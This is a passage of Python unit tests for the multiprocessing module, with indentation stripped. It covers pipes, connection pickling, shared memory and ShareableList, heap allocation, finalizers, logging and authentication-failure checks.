a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message into the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
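# A minimal sketch (standard multiprocessing API; names are illustrative)
# of the technique under test: Connection objects can themselves be
# pickled and sent over another connection, handing one end of a pipe to
# an already-running child.
#
#   import multiprocessing
#
#   def worker(conn):
#       inner = conn.recv()            # receives a Connection object
#       inner.send('hi from child')
#
#   if __name__ == '__main__':
#       outer, outer_child = multiprocessing.Pipe()
#       inner_parent, inner_child = multiprocessing.Pipe()
#       p = multiprocessing.Process(target=worker, args=(outer_child,))
#       p.start()
#       outer.send(inner_child)        # pickled via multiprocessing.reduction
#       print(inner_parent.recv())     # -> 'hi from child'
#       p.join()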
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
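# A minimal Windows-only sketch (assuming the DupHandle helper from
# multiprocessing.reduction mentioned above, and the _winapi constants
# multiprocessing relies on):
#
#   from multiprocessing.reduction import DupHandle
#   import _winapi
#   dh = DupHandle(handle, _winapi.FILE_GENERIC_READ)  # not SAME_ACCESS
#   h = dh.detach()            # performed in the receiving process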
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating a shared memory segment with a negative size fails.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching to a shared memory segment without a name fails.
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test that the shared memory segment is created properly when
# _make_filename returns an existing shared memory segment name.
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX, which can be '/psm_' or 'wnsm_'; this is necessary
# because some POSIX-compliant systems require the name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# POSIX shared memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
def test_shared_memory_across_processes(self):
# bpo-40135: don't give the shared memory block an explicit name, to
# avoid failures when multiprocessing tests are run in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals,
# maintain its connection with the current process, and succeed when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
# test that the custom signal handler registered in the Manager does
# not affect signal handling in the parent process.
with self.assertRaises(KeyboardInterrupt):
os.kill(os.getpid(), signal.SIGINT)
smm.shutdown()
@unittest.skipIf(os.name != "posix", "resource_tracker is posix only")
def test_shared_memory_SharedMemoryManager_reuses_resource_tracker(self):
# bpo-36867: test that a SharedMemoryManager uses the
# same resource_tracker process as its parent.
cmd = '''if 1:
from multiprocessing.managers import SharedMemoryManager
smm = SharedMemoryManager()
smm.start()
sl = smm.ShareableList(range(10))
smm.shutdown()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
# Before bpo-36867 was fixed, a SharedMemoryManager not using the same
# resource_tracker process as its parent would make the parent's
# tracker complain about sl being leaked even though smm.shutdown()
# properly released sl.
self.assertFalse(err)
def test_shared_memory_SharedMemoryManager_basics(self):
smm1 = multiprocessing.managers.SharedMemoryManager()
with self.assertRaises(ValueError):
smm1.SharedMemory(size=9) # Fails if SharedMemoryServer not started
smm1.start()
lol = [ smm1.ShareableList(range(i)) for i in range(5, 10) ]
lom = [ smm1.SharedMemory(size=j) for j in range(32, 128, 16) ]
doppleganger_list0 = shared_memory.ShareableList(name=lol[0].shm.name)
self.assertEqual(len(doppleganger_list0), 5)
doppleganger_shm0 = shared_memory.SharedMemory(name=lom[0].name)
self.assertGreaterEqual(len(doppleganger_shm0.buf), 32)
held_name = lom[0].name
smm1.shutdown()
if sys.platform != "win32":
# Calls to unlink() have no effect on Windows; shared memory is
# only released once the final process exits.
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_shm = shared_memory.SharedMemory(name=held_name)
with multiprocessing.managers.SharedMemoryManager() as smm2:
sl = smm2.ShareableList("howdy")
shm = smm2.SharedMemory(size=128)
held_name = sl.shm.name
if sys.platform != "win32":
with self.assertRaises(FileNotFoundError):
# No longer there to be attached to again.
absent_sl = shared_memory.ShareableList(name=held_name)
def test_shared_memory_ShareableList_basics(self):
sl = shared_memory.ShareableList(
['howdy', b'HoWdY', -273.154, 100, None, True, 42]
)
self.addCleanup(sl.shm.unlink)
# Verify attributes are readable.
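# (ShareableList packs each item into an 8-byte slot using struct
# formats: '8s' for the str/bytes items, 'd' for the float, 'q' for the
# ints, and a '?' byte with 'x' padding for the bool and None entries,
# which is what produces the format string asserted below.)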
self.assertEqual(sl.format, '8s8sdqxxxxxx?xxxxxxxx?q')
# Exercise len().
self.assertEqual(len(sl), 7)
# Exercise index().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
with self.assertRaises(ValueError):
sl.index('100')
self.assertEqual(sl.index(100), 3)
# Exercise retrieving individual values.
self.assertEqual(sl[0], 'howdy')
self.assertEqual(sl[-2], True)
# Exercise iterability.
self.assertEqual(
tuple(sl),
('howdy', b'HoWdY', -273.154, 100, None, True, 42)
)
# Exercise modifying individual values.
sl[3] = 42
self.assertEqual(sl[3], 42)
sl[4] = 'some' # Change type at a given position.
self.assertEqual(sl[4], 'some')
self.assertEqual(sl.format, '8s8sdq8sxxxxxxx?q')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[4] = 'far too many'
self.assertEqual(sl[4], 'some')
sl[0] = 'encodés' # Exactly 8 bytes of UTF-8 data
self.assertEqual(sl[0], 'encodés')
self.assertEqual(sl[1], b'HoWdY') # no spillage
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[0] = 'encodées' # Exactly 9 bytes of UTF-8 data
self.assertEqual(sl[1], b'HoWdY')
with self.assertRaisesRegex(ValueError,
"exceeds available storage"):
sl[1] = b'123456789'
self.assertEqual(sl[1], b'HoWdY')
# Exercise count().
with warnings.catch_warnings():
# Suppress BytesWarning when comparing against b'HoWdY'.
warnings.simplefilter('ignore')
self.assertEqual(sl.count(42), 2)
self.assertEqual(sl.count(b'HoWdY'), 1)
self.assertEqual(sl.count(b'adios'), 0)
# Exercise creating a duplicate.
sl_copy = shared_memory.ShareableList(sl, name='test03_duplicate')
try:
self.assertNotEqual(sl.shm.name, sl_copy.shm.name)
self.assertEqual('test03_duplicate', sl_copy.shm.name)
self.assertEqual(list(sl), list(sl_copy))
self.assertEqual(sl.format, sl_copy.format)
sl_copy[-1] = 77
self.assertEqual(sl_copy[-1], 77)
self.assertNotEqual(sl[-1], 77)
sl_copy.shm.close()
finally:
sl_copy.shm.unlink()
# Obtain a second handle on the same ShareableList.
sl_tethered = shared_memory.ShareableList(name=sl.shm.name)
self.assertEqual(sl.shm.name, sl_tethered.shm.name)
sl_tethered[-1] = 880
self.assertEqual(sl[-1], 880)
sl_tethered.shm.close()
sl.shm.close()
# Exercise creating an empty ShareableList.
empty_sl = shared_memory.ShareableList()
try:
self.assertEqual(len(empty_sl), 0)
self.assertEqual(empty_sl.format, '')
self.assertEqual(empty_sl.count('any'), 0)
with self.assertRaises(ValueError):
empty_sl.index(None)
empty_sl.shm.close()
finally:
empty_sl.shm.unlink()
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertIsInstance(deserialized_sl, shared_memory.ShareableList)
self.assertEqual(deserialized_sl[-1], 9)
self.assertIsNot(sl, deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# Abruptly killing a process that holds a reference to a shared
# memory segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
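# A minimal sketch (standard multiprocessing.util API) of the Finalize
# semantics exercised below: a finalizer fires when its referent is
# garbage-collected or when called directly, and at most once; finalizers
# with an exitpriority also run at process exit, highest priority first.
#
#   import multiprocessing.util as util
#
#   class Resource:
#       pass
#
#   r = Resource()
#   fin = util.Finalize(r, print, args=('cleaned up',), exitpriority=10)
#   fin()        # prints 'cleaned up'
#   fin()        # no-op: the callback has already run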
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(folder, '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertIsNotNone(logger)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
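# The handshake under test: deliver_challenge() sends b'#CHALLENGE#' plus
# random bytes and expects back an HMAC-MD5 digest of those bytes keyed
# by the authkey (hence the requires_hashdigest('md5') decorator above);
# answer_challenge() is the client half. The fake connections below
# return bogus bytes so each side raises AuthenticationError.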
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
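# A minimal sketch (standard Pool API; names are illustrative) of the
# feature under test: the initializer runs once in every worker process
# before any tasks are executed.
#
#   import multiprocessing
#
#   def init_worker(tag):
#       global worker_tag
#       worker_tag = tag
#
#   if __name__ == '__main__':
#       with multiprocessing.Pool(2, init_worker, ('configured',)) as pool:
#           pool.map(str, range(4))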
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
